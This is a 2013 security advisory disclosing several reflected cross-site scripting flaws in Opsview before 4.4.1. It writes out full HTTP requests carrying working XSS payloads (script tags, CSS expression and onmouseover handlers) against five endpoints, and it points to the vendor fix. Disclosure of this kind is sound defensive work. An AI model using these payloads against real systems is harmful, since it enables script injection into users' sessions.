CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
Version(s): Opsview pre 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)
I. ADVISORY
Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View
Date published: 2013-10-28
Vendor contacted: 2013-09-04
II. BACKGROUND
Opsview is a systems management software built on open
source software. To minimize noise, read more about it
here
http://www.opsview.com/about-us
II. DESCRIPTION
Opsview is vulnerable to a few different XSS based attacks.
/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/
There are a variety of iterations within those functions
which may allow a malicious user to trigger a cross site
scripting attack.
III. EXAMPLE
GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
------------
GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
------------
POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no
------------
POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
&from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit
------------
GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
III SOLUTION
Opsview released a fix with Opsview 4.4.1
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes
--
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama
42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF